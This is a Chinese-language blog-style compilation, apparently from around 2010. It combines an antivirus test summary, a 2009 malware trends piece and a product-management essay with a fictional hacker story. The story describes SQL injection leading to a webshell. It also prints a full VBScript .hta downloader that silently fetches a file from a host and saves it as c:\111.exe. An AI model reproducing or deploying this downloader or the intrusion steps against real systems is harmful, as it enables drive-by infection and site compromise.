但整体来看,在防挂马测试中,没有一款杀毒软件能百分之一百拦截挂马网站,可见杀毒软件整体还需要加强防挂马的能力。另外,我们也建议用户在使用杀毒软件时,可以配合一些安全辅助工具使用,以确保达到最大的安全效果,例如瑞星和卡卡上网助手、金山和金山网盾、卡巴斯基和安天、360三件套(杀毒软件、安全浏览器和安全卫士)。
 
安全小百科:网页挂马为什么难防?
网页木马难防,主要有两个原因,一个原因是它们利用用户电脑中的各式各样的漏洞偷偷潜入。以前用的最多的是系统漏洞,现在主流的都是第三方软件漏洞,因为很多用户都没有软件打安全补丁的习惯。第二个原因木马在变成网页木马之前,一般都会用加花、加壳等手段进行了免杀处理,会针对杀毒软件进行特别的处理。所以,网页木马才如此难缠。
 
总结
通过整个测试,我们可以发现杀毒软件的一些共同的发展趋势:安装简便,不让用户做过多的操作;软件不需要进行什么设置就可以满足主要的安全需求;界面清爽、让用户一目了然的知道软件的主要功能;内存占用少,在考虑监控的同时尽量减少内存占用;增强防挂马能力,防挂马这个领域虽然受到了杀毒软件厂商的足够重视,但从测试结果中可以看出。拦截网页木马的能力还需要加强。
测试的9款杀毒软件各有千秋,例如卡巴斯基、360、NOD32杀毒能力强劲,360、微软MSE、诺顿内存占用低,卡巴斯基、诺顿、江民扫描时间较少,金山、瑞星、卡巴斯基和安天拦截网页木马的功能不俗等。
当前网络安全形势比较复杂,杀毒软件仅仅防范挂马网站、与盗号病毒博弈是仅仅不够的,还有一个安全威胁被忽视了,那就是涉及股票和网银交易的诈骗网站,这些网站在网上大肆行骗,无数用户被骗。
所以,我们额外进行了诈骗网站的测试,主要都是股票诈骗网站和假淘宝网站,结果不尽如人意。虽然一些浏览器、一些安全辅助工具可以屏蔽这些网站,但是作为用户安全的保护神的杀毒软件同样不应该忽视这个部分。希望在下一个版本中,杀毒软件厂商可以增加屏蔽股票、交易类诈骗网站的功能。
解决电脑安全问题,杀毒软件固然重要,但最根本的还是用户的电脑使用习惯,如果用户关闭了系统自动播放功能,平时上的网站比较固定且都是大型网站,中毒的几率是非常小的。此外,用户还可以升级系统到Windows 7,使用普通登录模式,该模式的权限较低,大多数病毒无法运行。

本文纯属虚构,如有雷同,请让雷先生致电作者

 

第一幕:遭遇小白

我叫小黑,黑白的黑。

小黑是我的网名,因为我是网络中的一名侠客,或者通俗点儿说是一名黑客。我很喜欢行侠仗义的感觉,我崇拜着那种武侠小说里描绘的“侠之大者”和黑社会的古惑仔义气;向往着那种刀光剑影,大碗喝酒、大口吃肉的豪情;不过我只能够在网络的江湖中掀起血雨腥风。当然主要也因为现实生活中的我……

唉,不提了,总之,我是网络中的大侠就可以。

窗外的风又开始吹了,挟裹着白色的雪花打在窗户上,冷风巧妙的绕过那层单薄的玻璃,让屋内寒气袭人。在这个仅有8平米的小房子里,我的手冻得瑟瑟发抖,看着电脑屏幕中PCShare木马中的庞大肉鸡群,我开始漫无目的翻检这些肉鸡的目录。

突然,一台肉鸡吸引了我的注意,屏幕中这台电脑的主人似乎在更新一个网站,难道这是一个网站管理员的电脑?我一下子提起了精神,先提取一下键盘记录,把他的密码搞回来再说。可不知道为什么点了查看“键盘记录”按钮N次,最终什么都提取回来,这是怎么回事儿?查看一下肉鸡的进程!

-_-||我彻底无语了,中国排名前十名的木马和病毒几乎都能够在这台肉鸡中找到,由于病毒多,相互争夺权限,也导致了我无法正常提取回这台肉鸡的键盘记录。眼看着这个肉鸡的上的小白就关闭了自己的网站后台界面,我那叫一个着急呀。

难道我真的寂寞到了极点?不知道为什么我竟然调出了木马的信使功能,给这个电脑小白发了一段话:“你电脑中的病毒真多呀!”。这段话的突然出现让似乎让这个小白有些莫名其妙,在木马的屏幕监控上,小白似乎停止了所有的操作。

“你是谁呀?”

晕,这个小白竟然用信使回复我了。我还以为她会吓得屁滚尿流的关闭电脑。

“我是黑客,我入侵了你的电脑,你害怕不害怕呀?”

“哇!黑客,好神奇呀!你能够进我电脑一定很厉害!”

“-_-||是吗?你的电脑里有好多病毒!”

“我说怎么总感觉它最近反应慢,要不黑客,你帮我杀杀毒吧!”

“o_o||”

“你刚在在更新网站?”

“对呀,我是XX房地产公司的,我刚才在更新我们新开盘的房屋价格。”

此时我在顿然醒悟,这个小白竟然是有地产界“大炮”称号的奸商公司的员工。进入他们公司的网站,里面贴满了“大炮”有经典语录的文章:“中国人太有钱,房子太便宜”、“高档房本来就是穷人买不起的”、“没买房的人都亏了”……

黑了他!

 

第二幕:黑客无敌

我大学毕业一年多了,在没有迈入社会之前,总以为只要学了跟计算机专业沾边的,就凭我这IQ,将来不是比尔盖茨就是乔布斯,最差也混个马云呀。不过现在看来,我只有给老板们当牛做马的份儿。每个月领着微薄的工资,在城中村简陋的板房中孤单生活。

其实我也有一段凄美的爱情故事,我和女友圆圆险些就步入洞房了,但那个冷若冰霜的准丈母娘冷酷的问我:“娶我女儿的洞房在什么地方?”这时我才发现,无论现实还是童话故事,都是一样残酷的,如果王子没有城堡,公主宁肯嫁给史瑞克,至少他在沼泽地里有木屋。彻底沦为剩男中的“剩斗士”之后,上网成为了我唯一的调剂,我多么希望我菜地里的那栋豪宅能够变成现实呀。

“没买房的人都亏了”,是呀,我连老婆都因为你们这帮奸商亏给别人了!黑掉他!这是我脑海里唯一想到的。传统文化教育我们,谦虚使人进步,骄傲使人落后。在今天这个竞争激烈,张扬自我的年代,谦虚往往失去许多机会,我小黑这个时候就不谦虚了!

说干就干,我迅速调开这个网站的新闻页面,发现网站程序是用动态语言PHP写的,网址都是类似“http://www.nongsita.com/fangzi.php?username=888”这样的动态页面,只要不是HTML之类的静态网页,就总能够找到漏洞。我于是开始在每个网址后面加入了一个“,”号,仅耗时5分钟其中一个页面就立刻爆出了MYSQL的错误提示页面。

注入点顺利的找到了,此时可以祭出辅助工具帮助进行渗透了。我调出了PHP注入中小有名气的“翔哥PHP注入工具”,这是一款能够帮助黑客进行SQL注入的最好的工具之一。

黑客小知识:所谓的SQL注入测试就是通过利用目标网站的某个页面缺少对用户传递参数控制或者控制的不够好的情况下出现的漏洞,从而达到获取、修改、删除数据,甚至控制数据库服务器、Web服务器的目的的测试方法。“翔哥PHP注入工具”能够通过一系列非常简单的操作,达到最大化的攻击测试效果。它从检测注入开始到最后控制目标系统都给出了测试步骤。

在PHP注入工具的URL一项中输入查找出的注入点网址,然后点击Check就开始进行注入漏洞的检验了。很快这家房地产公司网站的数据库名称等信息就全部被猜了出来,然后使用MySQL的提权工具进行提权,添加管理员账号,上传Webshell木马。将他们老板的照片全部PS……

 

第三幕:连环套,黑吃黑

CBD中心一座摩天高楼中,“大炮”因为新闻媒体报道自己公司网站被黑很不爽。他拿着一支雪茄烟,声色俱厉的训斥着下属。

“狂牛,找到这个跟我作对的家伙!”

屋子里的一个略带微胖的男人,没有说话,轻轻的点了点头,转身离去。

狂牛回到自己的办公室,开始着手分析入侵者,仅凭着直觉,他很快就找到了小黑留在网站中的后门WebShell。

狂牛冷冷一笑,他的计划很简单,在小黑的WebShell上挂一个木马,只要小黑再次向登陆他留在网站中的这个后门,就有可能会中狂牛的木马。狂牛想做的不是清除掉小黑的程序,而是直接清除掉小黑。狂牛在小黑的留下的后门网页中插入了一段iframe框架代码,这段代码指向了一个特殊的.hta的网页,随后在写字板里写下了一段代码:

<script language=vbs>

window.moveTo 4000,4000

window.resizeTo 0,0 ‘使hta不可见

set objshell= Createobject(”WScript.Shell”)’hta是可以直接调用WScript.Shell的,不过不能调用wscript.Createobject(”WScript.Shell”)

downpath=objshell.ExpandEnvironmentStrings(”%USERPROFILE%”)&”\Local Settings” ‘根据环境变量得到下载的路径

set xml=document.createElement_x(”xml”)’建方xml元素调用ie的默认行为

xml.addBehavior(”#default#DownLoad”)

xml.async=0

xml.load(”http://192.168.0.10/xx.htm”)’请把exe改名放到空间上,用ftp软件上传的话,可能不行,直接放比较好

ShowAllFile(downpath)

Sub ShowAllFile(Path)

FindFileName=”xx[1].htm” ‘这个也是你需要改的,如果上边是xx.htm,这里就是xx[1].htm

Set FSO = CreateObject(”Scripting.FileSystemObject”)

Set f = FSO.GetFolder(Path)

Set fc = f.SubFolders

For Each f1 in fc

If FSO.FileExists(path&”\”&f1.name&”\”&FindFileName) Then

FSO.CopyFile path&”\”&f1.name&”\”&FindFileName, “c:\111.exe” ‘保存到c:\111.exe,可根据需要改动

‘document.write “[+]**** Success !”

End If

ShowAllFile path&”\”&f1.name

Next

Set FSO = Nothing

End Sub

window.close

</script>

代码写完后,保存为.hta文件,带着木马被一并上传到了被黑的网站中。狂牛现在所做的仅是等待……

 

第四幕:三天后

凌晨2点,小黑刚刚打开电脑,连接上网络,突然屏幕一黑,硬盘开始疯狂的转动,小黑此时意识到大事不妙,慌忙的去拔网线,然而一切都晚了,硬盘中的数据已经全部被销毁,连主板的BIOS也被破坏,狂牛将小黑电脑BIOS启动图片修改成了一个大大的“拆”字……

2010-01-04

2009年,用电脑需要安装杀毒软件,几乎已经成为了每个用户的常识。而现在互联网让病毒变得更加疯狂,它们变化速度快,传播途径多,如今的电脑病毒,已经不单再是地域特色的病毒,而是像一场每天都在发作的全球化瘟疫。

 

无所不用的途径

机器狗、熊猫烧香,这些当年泛滥成灾的病毒都遵循了一个非常简单的真理——无所不用的传播途径。U盘、手机、Mp3、电子邮件、QQ等众多感染方法,都是促成这两款病毒大范围流行的助推剂。而进入2009年以后,越来越多的病毒开始争相模仿那些成功的病毒案例,可以说如今的病毒几乎个个长得都像熊猫烧香,都像机器狗。

通过多种方法感染用户的电脑,大大增加了病毒的生存和传播能力。一个去照片打印店打印数码照片的学生,通常都会感染打印店电脑中的U盘病毒,而这个U盘又会通过各种途径感染教师、宿舍和其他地方的电脑。

除了感染传播介质,许多病毒作者也开始将变身兼职黑客,通过入侵网站挂马这种方式进行病毒传播。根据安天实验室统计显示,2009年共拦截恶意网站6,550,000个,以8月拦截最多830,000个。因为被挂马的网站访问量的大小会直接导致中木马机率的高低,所以现在挂流量大的网站已成为新的趋势。就同现今流行的甲流一样,2009年的病毒已经盯上了所有的传播途径,让你防不胜防!

 

变种更新快速化

快,是网络时代的速度。在网络时代,病毒也变得越来越快速,这种快速体现在病毒变种的速度上。以前病毒出现变种,往往需要再次重演一遍之前的病毒感染过程。不过网络改变了一切,网络时代杀毒软件升级速度越来越快,病毒变种的生存时间越来越短。但病毒作者们很快找到了应对之道,他们不再投放单一的病毒,而是通过病毒下载器这种只有下载功能的病毒传播平台,让网络用户源源不断的从他们制定的地方下载新病毒。

这些下载的病毒一旦能够被杀毒软件大范围的查杀,他们很快就够制造出变种,并进行更新,让你永远也无法斩尽杀绝所有的病毒。下载、变种将在未来形成一套更为强悍的网云病毒变种体系。

 

云杀毒时代来临

进入21世纪以来,病毒诞生的速度每天都在增长,反病毒软件公司似乎陷入了一个看不到尽头的黑洞中,为了应对这种激增,需要雇佣大量的病毒分析员。然而这仍然无法应对每天突增的病毒,误杀误报事件也逐渐增多。

云计算的出现让杀毒软件厂商看到了希望,通过云杀毒,软件公司可以通过用户人群的人海战术,发现那些可疑的病毒程序,让病毒查杀的时间和查杀的效率大大提高。不过目前云杀毒技术概念仍然很模糊,目前有安天探云计划、360云查杀、瑞星云安全等多种基于不同理念的云杀毒技术。

 

反病毒软件变身网络安全软件

网络让电脑面临了全新的网络安全问题,木马盗号、网页挂马、数据丢失等网络安全威胁成为用户上网时遇到的主要问题。根据安天实验室数据显示,2009年木马占比达77%,总数量已达千万,仍稳居恶意代码主流地位。蠕虫与病毒相对08年占比均有所回落;蠕虫08年占比11%,今年占比8%;病毒08年占比5%,今年占比4%。以恶意代码呈几何级数的增长速度来预计:2010年以后木马的数量级达到上亿,那么蠕虫与病毒等类别恶意代码,在木马的庞大基数下,将直接被淹没。以前只负责反病毒的杀毒软件功能为了应对新的危机,也在逐渐增多新的功能,改善杀毒软件引擎技术。

 

反病毒市场细分化更严重

病毒花样的增多,让许多反病毒软件无法有效的处理一些个案案例,例如泛滥成灾的U盘病毒,依靠传统的特征码识别技术,在升级病毒库不及时的情况下,杀毒软件几乎无法有效应对这种威胁,于是应运而生了专门处理U盘病毒的免疫工具软件。

网页挂马、账号保护等市场在未来还会呈现出逐渐细分的状态,金山网盾、安天锐甲、U盘免疫工具等免费小工具,不仅帮助用户解决了针对性的病毒问题,也让杀毒软件公司通过这种类型病毒解决手法,有效的弥补了传统杀毒软件的短板。

苗得雨

作为产品经理,我曾经多次和研发人员交流寻找用户需求的重要性,我们的研发人员也的确在四处寻找用户到底需要什么,网络时代让产品和产品之间易用性与特性的比拼加剧,特别是软件产品,用户无论从获取、安装还是卸载,成本接近于0,更新替代在电脑世界将会更加残酷。所以,软件产品要生存,要长久的活在用户的计算机中,就必须比以往更加符合用户的需求。

许多软件公司在这样的竞争环境中,总是感叹自己跟不上民间草根创业团队的步伐,草根创业团队往往能够通过一些新奇的小功能,一夜之间成为翘楚。创新、快速就是他们制胜的法宝。小团队这种创新往往来自于程序员自己的一个需求,而网络中没有软件能够满足他脑海中的这种潜在需求,于是自己开发一个软件解决这个问题成为了最直接有效的方法。

没有任何限制,没有开发计划,没有需求文档。他们往往只是把自己的需求用看似理所当然的方法解决了,但是正是这种需求解决方式和这种创造,催生了无数网络创业团队,也催生了无数以前未被发现的优秀软件功能,例如中国用户迫切需要的系统补丁升级功能。这项功能在大的软件公司没有发现它之前,许多地下软件组织已经开始制造山寨版的Windows系统补丁包了。

方法陈旧也是让许多软件公司产品无法迎合用户和消费者口味的重要原因。许多软件爱你公司喜欢在研发新品之前做大量的市场调查,问用户对于新产品的感觉如何,希望通过缜密的科学流程和数据作为支撑,说服企业管理层对于新产品研发的支持。

其实消费者的喜好不一定能准确反映出产品未来的市场。传统的调查受制于两个因素:第一,民众的经验限制了他们对未来的想象力;第二,民众无法判断当各个商业元素组合在一起时产生的整合力量。消费体验的创新来自于对消费者的深刻洞察,而不是询问。《引爆点》作者马尔科姆.格拉德维尔说:“解释他们的行为或意图是不可能的,他们会受制于自身的保守和未知。”

如果你问消费者愿不愿意接受酒店提供大块肥皂,他们会说大的多么不卫生等等。但喜来屋不听这套,他们重新设计了大块香皂,印上一个甜蜜的Logo,配上一个时尚又物美价廉的旅行故事,不仅迎合了消费者,还为此省下了4.5美元的成本。

看到了吗?我们需要来自消费者的判断,但需要用更好的方法获得。我们应该用自己的行为模式、态度和价值观去利用这些反馈,应用到我们已知的未来趋势,让消费者感到惊喜。企业特别是产品经理要结合情景规划、社会科学和决策管理等工具,才能准确理解消费者的类型,推动消费体验的创新。

一个优秀的产品经理需要的也不仅是一大堆刻板的数据,他更需要一个灵敏的直觉,需要有多年行业探索的经验,才能够准确的通过直觉发现那些尚未挖掘的黄金地带。